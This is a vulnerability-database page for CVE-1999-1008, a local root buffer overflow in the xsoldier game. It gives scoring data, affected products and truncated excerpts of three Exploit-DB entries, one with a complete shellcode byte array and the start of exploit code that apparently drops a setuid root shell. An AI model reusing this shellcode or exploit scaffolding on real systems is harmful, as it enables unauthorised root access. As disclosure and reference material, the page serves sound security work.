CVE-1999-1008
published 2000-05-17CVE-1999-1008: xsoldier program allows local users to gain root access via a long argument.
PriorityP423high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.73%
49.7th percentile
xsoldier program allows local users to gain root access via a long argument.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| mandrakesoft | mandrake_linux | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
xsoldier 0.96 (RedHat 6.2) - Local Buffer Overflow
exploitdb·2000-12-15
CVE-1999-1008 xsoldier 0.96 (RedHat 6.2) - Local Buffer Overflow
xsoldier 0.96 (RedHat 6.2) - Local Buffer Overflow
---
#include
#include
#define NOP 0x90
#define BUFSIZE 4408
#define OFFSET 0
#define RANGE 20
unsigned char blah[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
"\xc2\x91";
long get_sp () { __asm__ ("mov %esp, %eax"); }
int
main (int argc, char *argv[])
{
char buffer[BUFSIZE];
int i, offset;
unsigned long re
Exploit-DB
xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)
exploitdb·2000-05-17
CVE-1999-1008 xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)
xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/871/info
Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console.
The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string.
The user does not have to have a valid $DISPLAY to exploit this.
/*
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/
Exploit-DB
xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (2)
exploitdb·2000-05-17
CVE-1999-1008 xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (2)
xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (2)
---
/*
source: https://www.securityfocus.com/bid/871/info
Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console.
The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string.
The user does not have to have a valid $DISPLAY to exploit this.
*/
/*Larry W. Cashdollar linux xsolider exploit.
*[email protected] http://vapid
No writeups or analysis indexed.
2000-05-17
Published